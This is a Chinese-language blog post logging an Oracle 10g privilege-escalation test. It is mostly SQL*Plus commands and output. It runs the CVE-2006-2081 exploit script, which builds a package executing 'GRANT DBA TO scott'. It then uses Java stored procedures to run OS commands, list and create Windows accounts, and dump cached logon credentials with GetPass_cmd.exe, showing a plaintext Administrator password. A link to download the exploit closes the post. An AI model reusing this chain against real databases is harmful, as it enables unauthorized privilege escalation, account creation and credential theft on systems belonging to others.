首页 > 数据库 >Oracle 10g提权测试

Oracle 10g提权测试

时间:2023-04-03 23:04:17浏览次数:47  
标签:NO completed 10g --- 提权 SQL Oracle YES


一直想摸索一下orcl提权的方式,今天测试了一下10g,可以成功提权。

 

C:\wmpub>sqlplus scott/tiger@orcl

SQL*Plus: Release 10.2.0.1.0 - Production on 星期一 10月 31 07:41:29 2016

Copyright (c) 1982, 2005, Oracle. All rights reserved.

连接到:
Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Production
With the Partitioning, OLAP and Data Mining options

SQL> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT RESOURCE NO YES NO

SQL> @dbms_exp_ext.sql
[+] dbms_exp_ext.sql exploit (CVE-2006-2081)
[+] by Andrea "bunker" Purificato - http://rawlab.mindcreations.com
[+] 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2

Target username (default TEST): scott

[-] Wait...

程序包已创建。

[-] Building evil package...
原值 6: EXECUTE IMMEDIATE 'GRANT DBA TO &the_user';
新值 6: EXECUTE IMMEDIATE 'GRANT DBA TO scott';

程序包体已创建。

[-] Finishing evil package...

PL/SQL 过程已成功完成。

[-] YOU GOT THE POWAH!!

SQL> select * from user_role_privs;  //提升得到JAVASYSPRIV权限

USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT JAVASYSPRIV NO YES NO
SCOTT RESOURCE NO YES NO

 

SQL> @2.sql //执行系统命令,新建账号密码

Java created.

Function created.

Procedure created.

PL/SQL procedure successfully completed.

grant javasyspriv to system
*
ERROR at line 1:
ORA-01932: ADMIN option not granted for role 'JAVASYSPRIV'

 

Windows IP Configuration

Ethernet adapter ????:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.9.10.202
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.9.0.1

PL/SQL procedure successfully completed.

User accounts for \\
-------------------------------------------------------------------------------
Administrator ASPNET Guest
IUSR_SNOWW-2CD7D87E5 IWAM_SNOWW-2CD7D87E5 SUPPORT_388945a0
The command completed with one or more errors.

PL/SQL procedure successfully completed.

SQL>
SQL> exec :x:=run_cmd('D:\temp\GetPass_cmd.exe');  //读取系统缓存的账号密码 
UserName: Administrator
LogonDomain: WIN2003-WVS2
password: abc123!
UserName: NETWORK SERVICE
LogonDomain: NT AUTHORITY
password:
UserName:
LogonDomain:
Specific LUID NOT found
UserName: ANONYMOUS LOGON
LogonDomain: NT AUTHORITY
Specific LUID NOT found
UserName: WIN2003-WVS2$
LogonDomain: WORKGROUP
Specific LUID NOT found

PL/SQL procedure successfully completed.

SQL>

提权脚本:http://rawlab.mindcreations.com/codes/exploit/oracle/dbms_exp_ext.sql









标签:NO,completed,10g,---,提权,SQL,Oracle,YES
From: https://blog.51cto.com/bypass/6167686

相关文章

  • NBU上Oracle数据库恢复演练手册
    目录2. 1|01.1 Oracle数据库恢复 43.1 1|11.1.1 安装新的客户端 63.2 1|21.1.2 新建异机恢复文件 63.3 1|31.1.3 新建数据库实例 63.4 1|41.1.4 建立spfile文件 63.5 1|51.1.5 建立数据文件夹 113.6 1|61.1.6 启动数据库到nomount状态 123.7 1|71.1.7 列出备份信......
  • Oracle11G安装在Linux7.下版本上BUG处理
    1.Java页面框无法拖拽拉伸,需要加上jre环境变量./runInstaller-jreLoc/usr/lib/jvm/jre-1.8.02.安装执行到68%左右时报错解决方法:cd$ORACLE_HOME/sysman/libcpins_emagent.mkins_emagent.mk.bakviins_emagent.mk搜索:/NMECTL后面加上-lnnz11继续安装即可......
  • 7.Oracle里的常见的执行计划
    索引唯一扫描:indexuniquescanscott@ORCLPDB012023-04-0222:44:32>createtableemployee(gendervarchar2(1),employee_idnumber);Tablecreated.Elapsed:00:00:00.05scott@ORCLPDB012023-04-0222:45:05>insertintoemployeevalues('F','99......
  • ORACLE PL/SQL 程序包的创建与应用
    原文地址:https://www.cnblogs.com/huyong/archive/2011/05/26/2057973.html本篇主要内容如下:第七章  程序包的创建和应用7.1  程序包简介7.2  程序包的定义7.3  包的开发步骤7.4  包定义的说明7.5  子程序重载7.6  加密实用程序7.7  删除包7.8  包的......
  • ORACLE之PACKAGE-包、存储过程、函数
    原文地址:https://www.cnblogs.com/hoaprox/p/5316444.html1,简单的包。创建包规范:createorreplacepackagepack_test1is--定义过程1procedurep_test1(p_1invarchar2);--定义函数1functionf_test1(p_1invarchar2)returnvarchar2;endpack_test1;......
  • 【测试】主流数据库存储过程编写样例(Oracle、MySQL、SQL Server)
    这个...做测试其实有时候还是需要先弄点数据才好针对某些功能进行测试的(相信做过开发的都应该深有体会)。一般像我这种老油条都推荐使用存储过程来做的初始化数据,一来脚本不会骗人,二来可以通过另一种方式验证逻辑关系。下面将整理了三个主流数据库(Oracle、MySQL和SQLServer)的“单表......
  • 04_靶机Kioptrix1.2:CMS漏洞利用,使用ht编辑器修改sudoers文件提权,mysql查询
    思路:发现主机后进行目录扫描,发现登录口标注了CMS的版本,查看该类型CMS有没有漏洞,针对漏洞去github搜索脚本,拿到脚本后运行得到靶机的初级Shell,根据靶机内的文件内容指示使用ht编辑器,利用编辑器去修改用户的权限然后提权,拿到root权限结束基操代码不再粘贴首先进行目标靶机地址的......
  • oracle存储过程调试无法进入,oracle存储过程无法调试
    问题:使用pl/sqldeveloper调试oracle 存储过程。在存储过程上点右键,选调试(test),然后按f9(debug)。这是正常的话,那些run、stepinto等按钮就可以点了,或者点run到断点,或者点stepinto做单步跟踪。但是在一个oraclerac双机环境中调试一个存储过程,点f9后有时能继续run或者stepint......
  • 在docker中配置Oracle11g
    在docker中配置Oracle11gdocker镜像拉取及相关配置1.在docker打开的情况下,使用下方命令拉去镜像,大概需要下载3个G的image文件dockerpullregistry.cn-hangzhou.aliyuncs.com/helowin/oracle_11g2.启动Oracle镜像并为镜像新建容器,注意此处的oracle11g即为容器名,可以自主设置......
  • Oracle 执行Update 或 select for update 是卡着
    原因和解决方法这种只有update无法执行其他语句可以执行的其实是因为记录锁导致的,在oracle中,执行了update或者insert语句后,都会要求commit,如果不commit却强制关闭连接,oracle就会将这条提交的记录锁住。通过执行下列语句查询当前卡着的会话SELECTs.sid,s.serial#FROMv$l......